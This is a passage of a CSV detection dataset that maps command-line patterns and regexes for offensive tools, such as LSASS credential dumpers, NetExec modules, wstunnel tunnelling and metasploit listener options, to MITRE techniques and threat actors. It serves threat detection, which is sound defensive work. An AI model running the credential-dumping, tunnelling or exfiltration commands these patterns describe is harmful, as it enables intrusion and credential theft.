- Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","2024"
"* LocalShellExtParse.py*",".{0,1000}\sLocalShellExtParse\.py.{0,1000}","offensive_tool_keyword","LocalShellExtParse","Script to parse first load time for Shell Extensions loaded by user. Also enumerates all loaded Shell Extensions that are only installed for the Current User.","T1547.009 - T1129","TA0003 - TA0007","N/A","N/A","Discovery","https://github.com/herrcore/LocalShellExtParse","1","0","N/A","N/A","9","1","20","4","2015-06-08T16:55:38Z","2015-06-05T03:23:13Z","2025"
"* localtonet.service*",".{0,1000}\slocaltonet\.service.{0,1000}","offensive_tool_keyword","localtonet","LocaltoNet is a reverse proxy that enables you to expose your localhost services to the internet","T1090 - T1102 - T1071 - T1105","TA0010 - TA0011 - TA0009 - TA0003 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/engineseller/localtonet","1","0","N/A","N/A","10","1","6","4","2022-01-31T03:19:25Z","2022-01-31T03:17:18Z","2026"
"* --local-to-remote socks5://*",".{0,1000}\s\-\-local\-to\-remote\ssocks5\:\/\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","2027"
"* --local-to-remote stdio://*",".{0,1000}\s\-\-local\-to\-remote\sstdio\:\/\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","2028"
"* --local-to-remote tcp://*",".{0,1000}\s\-\-local\-to\-remote\stcp\:\/\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","2029"
"* --local-to-remote tproxy+tcp://*",".{0,1000}\s\-\-local\-to\-remote\stproxy\+tcp\:\/\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","2030"
"* --local-to-remote tproxy+udp://*",".{0,1000}\s\-\-local\-to\-remote\stproxy\+udp\:\/\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","2031"
"* --local-to-remote udp://*",".{0,1000}\s\-\-local\-to\-remote\sudp\:\/\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","2032"
"* -lockless -Command *",".{0,1000}\s\-lockless\s\-Command\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","2034"
"* --loggedon-users*",".{0,1000}\s\-\-loggedon\-users.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","2035"
"* loginAAD.ps1*",".{0,1000}\sloginAAD\.ps1.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","2037"
"* looneypwner.sh*",".{0,1000}\slooneypwner\.sh.{0,1000}","offensive_tool_keyword","POC","Exploit tool for CVE-2023-4911 targeting the 'Looney Tunables' glibc vulnerability in various Linux distributions.","T1068 - T1210 - T1555","TA0001 - TA0003 - TA0005","N/A","N/A","Exploitation tool","https://github.com/chaudharyarjun/LooneyPwner","1","0","#linux","N/A","10","1","38","12","2023-10-18T04:59:50Z","2023-10-17T07:44:16Z","2039"
"* --lport 1337 *",".{0,1000}\s\-\-lport\s1337\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","2040"
"* LPORT=4444*",".{0,1000}\sLPORT\=4444.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002  -  T1021","TA0001 - TA0002 - TA0003","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Exploitation tool","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","2041"
"* lsa minidump * -o *",".{0,1000}\slsa\sminidump\s.{0,1000}\s\-o\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","2042"
"* lsa minidump *.dmp*",".{0,1000}\slsa\sminidump\s.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","2043"
"* lsa minidump *.dmp*",".{0,1000}\slsa\sminidump\s.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","2044"
"* lsa minidump /*",".{0,1000}\slsa\sminidump\s\/.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","2045"
"* lsadump.py*",".{0,1000}\slsadump\.py.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","0","N/A","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","2046"
"* lsasecrets.py*",".{0,1000}\slsasecrets\.py.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","0","N/A","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","2047"
"* lsass.dmp*",".{0,1000}\slsass\.dmp.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Dump LSASS memory through a process snapshot (-r) avoiding interacting with it directly","T1110","TA0006","N/A","Black Basta","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2048"
"* lsass_creds.txt*",".{0,1000}\slsass_creds\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","2049"
"* Lsassx.ps1*",".{0,1000}\sLsassx\.ps1.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","0","N/A","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","2050"
"* Lsassx-OBF.ps1*",".{0,1000}\sLsassx\-OBF\.ps1.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","0","N/A","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","2051"
"* lsassy -k -d *",".{0,1000}\slsassy\s\-k\s\-d\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","2052"
"* lsassy*",".{0,1000}\slsassy.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","2053"
"* lsassy.dumper*",".{0,1000}\slsassy\.dumper.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","2054"
"* lu-enum.nse*",".{0,1000}\slu\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2055"
"* Luna Grabber Builder*",".{0,1000}\sLuna\sGrabber\sBuilder.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","N/A","N/A","10","","N/A","","","","2056"
"* LyncSniper.ps1*",".{0,1000}\/LyncSniper\.ps1.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","2057"
"* -M dfscoerce *",".{0,1000}\s\-M\sdfscoerce\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","2059"
"* -M empire_exec -o LISTENER=http-listener*",".{0,1000}\s\-M\sempire_exec\s\-o\sLISTENER\=http\-listener.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","2060"
"* -m enrichment.cli.submit_to_nemesis*",".{0,1000}\s\-m\senrichment\.cli\.submit_to_nemesis.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","2061"
"* -M gpp_autologin*",".{0,1000}\s\-M\sgpp_autologin.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","2062"
"* -M handlekatz *",".{0,1000}\s\-M\shandlekatz\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","2063"
"* -M keepass_discover *",".{0,1000}\s\-M\skeepass_discover\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","2064"
"* -M keepass_discover*",".{0,1000}\s\-M\skeepass_discover.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","2065"
"* -M keepass_trigger -o ACTION=ALL USER=*",".{0,1000}\s\-M\skeepass_trigger\s\-o\sACTION\=ALL\sUSER\=.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","2066"
"* -m lagentcmd *powershell *",".{0,1000}\s\-m\slagentcmd\s.{0,1000}powershell\s.{0,1000}","offensive_tool_keyword","SQLRecon","A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation","T1003.003 - T1049 - T1059.005 - T1078.003","TA0005 - TA0006 - TA0002 - TA0004","N/A","Black Basta","Exploitation tool","https://github.com/skahwah/SQLRecon","1","0","N/A","N/A","9","8","719","120","2025-01-10T17:42:49Z","2021-11-19T15:58:49Z","2067"
"* -M laps --kdcHost *",".{0,1000}\s\-M\slaps\s\-\-kdcHost\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","2068"
"* -M ldap-checker *",".{0,1000}\s\-M\sldap\-checker\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","2069"
"* -M ldap-checker *",".{0,1000}\s\-M\sldap\-checker\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","2070"
"* -M lsassy *",".{0,1000}\s\-M\slsassy\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","2071"
"* -M MAQ --kdcHost *",".{0,1000}\s\-M\sMAQ\s\-\-kdcHost\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","2072"
"* -M masky *CA=*",".{0,1000}\s\-M\smasky\s.{0,1000}CA\=.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","2073"
"* -M ms17-010 *",".{0,1000}\s\-M\sms17\-010\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","2074"
"* -M mssql_priv *",".{0,1000}\s\-M\smssql_priv\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","2075"
"* -M multirdp*",".{0,1000}\s\-M\smultirdp.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","2076"
"* -M nanodump *",".{0,1000}\s\-M\snanodump\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","2077"
"* -m olecmd -o *powershell *",".{0,1000}\s\-m\solecmd\s\-o\s.{0,1000}powershell\s.{0,1000}","offensive_tool_keyword","SQLRecon","A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation","T1003.003 - T1049 - T1059.005 - T1078.003","TA0005 - TA0006 - TA0002 - TA0004","N/A","Black Basta","Exploitation tool","https://github.com/skahwah/SQLRecon","1","0","N/A","N/A","9","8","719","120","2025-01-10T17:42:49Z","2021-11-19T15:58:49Z","2078"
"* -M pe_inject*",".{0,1000}\s\-M\spe_inject.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","2079"
"* -M petitpotam *",".{0,1000}\s\-M\spetitpotam\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","2080"
"* -M petitpotam*",".{0,1000}\s\-M\spetitpotam.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","2081"
"* -M printnightmare *",".{0,1000}\s\-M\sprintnightmare\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","2082"
"* -m privileged-users --full *",".{0,1000}\s\-m\sprivileged\-users\s\-\-full\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","2083"
"* -M procdump ",".{0,1000}\s\-M\sprocdump\s","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","2084"
"* -m rdrleakdiag -M masterkeys*",".{0,1000}\s\-m\srdrleakdiag\s\-M\smasterkeys.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","2085"
"* -m run_command -c *.exe*",".{0,1000}\s\-m\srun_command\s\-c\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","0","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","2086"
"* -M runasppl *",".{0,1000}\s\-M\srunasppl\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","2087"
"* -M scuffy -o SERVER=127.0.0.1*",".{0,1000}\s\-M\sscuffy\s\-o\sSERVER\=127\.0\.0\.1.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","2088"
